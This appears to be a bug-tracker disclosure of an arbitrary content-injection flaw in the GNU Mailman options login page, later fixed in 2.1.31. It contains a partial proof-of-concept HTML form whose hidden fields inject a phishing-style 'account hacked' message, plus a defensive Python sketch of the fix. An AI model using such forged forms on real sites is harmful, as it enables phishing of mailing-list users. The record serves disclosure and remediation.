Arbitrary Content Injection via the options login page.
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| GNU Mailman | Fix Released | Medium | Mark Sapiro | |
Bug Description
An issue similar to CVE - https:/
Steps To Reproduce:
1. Copy and save the following HTML code and open it in any browser.
Code:
<html>
<body>
<script>
<form action="https:/
<input type="hidden" name="email" value="
<input type="hidden" name="UserOptions" value="
<input type="hidden" name="language" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. Can be seen there- "Your account has been hacked. Kindly go to https:/
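
The reproduction above relies on a submitted form value being shown back on the list's own login page. As an added sketch (not Mailman's code or its actual fix; the function names, messages and address pattern are assumptions), this contrasts echoing the value with a notice that never contains request data:

```python
import html
import re

# Conservative address shape (an assumption for this sketch, not Mailman's
# validator): one token, no whitespace or markup, a single "@", dotted domain.
_ADDR_RE = re.compile(r"[A-Za-z0-9._%+\-]+@[A-Za-z0-9\-]+(\.[A-Za-z0-9\-]+)+")
MAX_ADDR_LEN = 254

GENERIC_ERROR = "Login failed. Check the address and password and try again."


def is_plausible_address(value):
    """True only for short, single-token strings shaped like user@host.tld."""
    return (
        isinstance(value, str)
        and len(value) <= MAX_ADDR_LEN
        and _ADDR_RE.fullmatch(value) is not None
    )


def login_notice_reflecting(email):
    """'Before' pattern: the submitted value is echoed into the page.
    HTML-escaping blocks markup, but free text still appears under the
    site's own name, which is the content-injection problem."""
    return "<p>Unknown address: %s</p>" % html.escape(email)


def login_notice_hardened(email):
    """'After' pattern: the notice is a fixed string with no request data.
    The value is returned for form pre-fill only if it is a plausible
    address, and is attribute-escaped even then."""
    prefill = html.escape(email, quote=True) if is_plausible_address(email) else ""
    return "<p>%s</p>" % GENERIC_ERROR, prefill


# Constructed sample inputs (not taken from the report).
SAMPLE_TEXT = "Please contact the list owner at once"
SAMPLE_ADDR = "user@example.org"

if __name__ == "__main__":
    print(login_notice_reflecting(SAMPLE_TEXT))
    print(login_notice_hardened(SAMPLE_TEXT))
    print(login_notice_hardened(SAMPLE_ADDR))
```
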
| Changed in mailman: | |
| milestone: | none → 2.1.31 |
| Changed in mailman: | |
| status: | Confirmed → Fix Released |
| information type: | Private Security → Public |
